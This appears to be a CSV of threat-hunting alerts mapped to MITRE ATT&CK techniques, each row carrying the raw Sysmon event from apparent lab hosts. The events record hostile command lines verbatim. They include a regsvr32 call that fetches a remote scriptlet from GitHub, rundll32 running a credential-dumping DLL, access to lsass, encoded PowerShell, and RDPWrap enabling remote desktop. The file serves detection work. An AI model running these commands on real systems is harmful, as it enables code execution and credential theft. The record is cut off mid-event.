17287 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-13 18:03:19.497 + 365ABB72-B167-5CD9-0000-001062160C00 + 2476 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-B0EC-5CD9-0000-00201D340100 + 0x1341d + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-B0EC-5CD9-0000-0010D9D20000 + 944 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5275 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + 2019-03-17 20:18:09.593 + 365ABB72-AB81-5C8E-0000-00102E9E0C00 + 3892 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding + C:\Windows\system32\ + PC04\IEUser + 365ABB72-A960-5C8E-0000-002004C00300 + 0x3c004 + 1 + High + MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-173D-5C8F-0000-00102A6A0000 + 608 + C:\Windows\System32\svchost.exe + 
C:\Windows\system32\svchost.exe -k DcomLaunch + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"Found User (PC04\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5275 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + 2019-03-17 20:18:09.593 + 365ABB72-AB81-5C8E-0000-00102E9E0C00 + 3892 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding + C:\Windows\system32\ + PC04\IEUser + 365ABB72-A960-5C8E-0000-002004C00300 + 0x3c004 + 1 + High + MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-173D-5C8F-0000-00102A6A0000 + 608 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"Found User (PC04\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5275 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + 2019-03-17 20:18:09.593 + 365ABB72-AB81-5C8E-0000-00102E9E0C00 + 3892 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process 
(Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding + C:\Windows\system32\ + PC04\IEUser + 365ABB72-A960-5C8E-0000-002004C00300 + 0x3c004 + 1 + High + MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-173D-5C8F-0000-00102A6A0000 + 608 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.110469,2019-05-27T05:29:17.110469+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppools /text:name ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5880 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.070 + 365ABB72-3D6D-5CEB-0000-0010575CFF00 + 2644 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppools /text:name + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606809.977481,2019-04-18T21:00:09.977481+04:00,,Threat,Medium,[ 
T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 23 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:14.781 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\vaultcli.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Credential Vault Client Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557770599.681478,2019-05-13T22:03:19.681478+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( /c notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17286 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-13 18:03:19.482 + 365ABB72-B167-5CD9-0000-0010EE150C00 + 2372 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + /c notepad.exe + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-B0EC-5CD9-0000-0020DE330100 + 0x133de + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0EC-5CD9-0000-0010D9D20000 + 944 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"[T1117] Bypassing 
Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243547 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.122 + 747F3D96-9F69-5E75-0000-0010DE732000 + 6400 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606809.977481,2019-04-18T21:00:09.977481+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 23 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:14.781 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\vaultcli.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Credential Vault Client Library + Microsoft® Windows® Operating System + Microsoft Corporation + 
SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243547 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.122 + 747F3D96-9F69-5E75-0000-0010DE732000 + 6400 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243547 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.122 + 
747F3D96-9F69-5E75-0000-0010DE732000 + 6400 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1003.001] Credential dump Thread Open to Lsass,1556628223.784179,2019-04-30T16:43:43.784179+04:00,,Threat,Critical,Process ( \\VBOXSVR\HTools\voice_mail.msg.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8," + + + + + 8 + 2 + 4 + 8 + 0 + 0x8000000000000000 + + + 9060 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 12:43:43.784 + 365ABB72-4055-5CC8-0000-0010769D0B00 + 1532 + \\VBOXSVR\HTools\voice_mail.msg.exe + 365ABB72-3FE0-5CC8-0000-00107E590000 + 492 + C:\Windows\System32\lsass.exe + 1744 + 0x001A0000 + + + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436014.483714,2019-07-30T01:33:34.483714+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4923 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:34.234 + 747F3D96-662E-5D3F-0000-0010C2048900 + 1976 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® 
Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Process - Created,1584794155.89745,2020-03-21T16:35:55.897450+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net start CDPSvc ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 244336 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 12:35:55.872 + 747F3D96-0A2B-5E76-0000-0010C02A3D00 + 7072 + C:\Windows\System32\net.exe + 10.0.17763.1 (WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net.exe + net start CDPSvc + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-06A4-5E76-0000-002043DE0200 + 0x2de43 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-077C-5E76-0000-0010A5BA2300 + 5068 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.000311,2019-05-27T05:29:17.000311+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\InetSRV\appcmd.exe" list vdir 
/text:physicalpath ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5877 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:16.960 + 365ABB72-3D6C-5CEB-0000-00107257FF00 + 3484 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\InetSRV\appcmd.exe" list vdir /text:physicalpath + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 238378 + + + + + Microsoft-Windows-Sysmon/Operational + alice.insecurebank.local + + + + + + 2019-06-21 07:35:50.093 + ECAD0485-88D6-5D0C-0000-001007AA1D00 + 1568 + C:\Windows\System32\rundll32.exe + 6.3.9600.17415 (winblue_r4.141028-1500) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump + C:\Users\administrator\Desktop\x64\ + insecurebank\Administrator + ECAD0485-87E3-5D0C-0000-0020266A0F00 + 0xf6a26 + 2 + High + 
SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C + ECAD0485-8897-5D0C-0000-0010A2FA1C00 + 3964 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"Found User (insecurebank\Administrator) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 238378 + + + + + Microsoft-Windows-Sysmon/Operational + alice.insecurebank.local + + + + + + 2019-06-21 07:35:50.093 + ECAD0485-88D6-5D0C-0000-001007AA1D00 + 1568 + C:\Windows\System32\rundll32.exe + 6.3.9600.17415 (winblue_r4.141028-1500) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump + C:\Users\administrator\Desktop\x64\ + insecurebank\Administrator + ECAD0485-87E3-5D0C-0000-0020266A0F00 + 0xf6a26 + 2 + High + SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C + ECAD0485-8897-5D0C-0000-0010A2FA1C00 + 3964 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"Found User (insecurebank\Administrator) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 238378 + + + + + 
Microsoft-Windows-Sysmon/Operational + alice.insecurebank.local + + + + + + 2019-06-21 07:35:50.093 + ECAD0485-88D6-5D0C-0000-001007AA1D00 + 1568 + C:\Windows\System32\rundll32.exe + 6.3.9600.17415 (winblue_r4.141028-1500) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump + C:\Users\administrator\Desktop\x64\ + insecurebank\Administrator + ECAD0485-87E3-5D0C-0000-0020266A0F00 + 0xf6a26 + 2 + High + SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C + ECAD0485-8897-5D0C-0000-0010A2FA1C00 + 3964 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1567169648.171875,2019-08-30T16:54:08.171875+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript c:\ProgramData\memdump.vbs notepad.exe) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (C:\Windows\System32\cmd.exe) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 32151 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-30 12:54:07.823 + 747F3D96-1C6F-5D69-0000-0010323C1F00 + 2576 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript c:\ProgramData\memdump.vbs notepad.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1B6A-5D69-0000-0020E5810E00 + 0xe81e5 + 1 + High + SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 
747F3D96-1B6C-5D69-0000-00106F060F00 + 2128 + C:\Windows\System32\cmd.exe + C:\Windows\System32\cmd.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436014.411034,2019-07-30T01:33:34.411034+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4922 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:34.216 + 747F3D96-662E-5D3F-0000-001011038900 + 6020 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556380674.165738,2019-04-27T19:57:54.165738+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c del /q "C:\Users\IEUser\Downloads\Flash_update.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6622 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1059,technique_name=Command-Line Interface + 2019-04-27 15:57:54.087 + 365ABB72-7C02-5CC4-0000-0010FD6E0C00 + 3188 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 
(win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /c del /q "C:\Users\IEUser\Downloads\Flash_update.exe" + C:\Users\IEUser\AppData\Roaming\ + IEWIN7\IEUser + 365ABB72-7AB1-5CC4-0000-0020BEF40000 + 0xf4be + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-7C01-5CC4-0000-00102B3E0C00 + 2680 + C:\Users\IEUser\Downloads\Flash_update.exe + "C:\Users\IEUser\Downloads\Flash_update.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1112] process updating fDenyTSConnections or UserAuthentication registry key values,1552853889.282593,2019-03-18T00:18:09.282593+04:00,,Threat,High,[T1112] process updating fDenyTSConnections or UserAuthentication registry key values,13," + + + + + 13 + 2 + 4 + 13 + 0 + 0x8000000000000000 + + + 5267 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + SetValue + 2019-03-17 20:18:09.272 + 365ABB72-AB70-5C8E-0000-0010DF1F0A00 + 3700 + C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe + HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections + DWORD (0x00000000) + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,Critical,"Found User (IIS APPPOOL\DefaultAppPool) run Suspicious PowerShell commands that include ( -enc , -noni ,-noni,-nop,powershell,\Windows\System32,ls, -t , -w ) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 
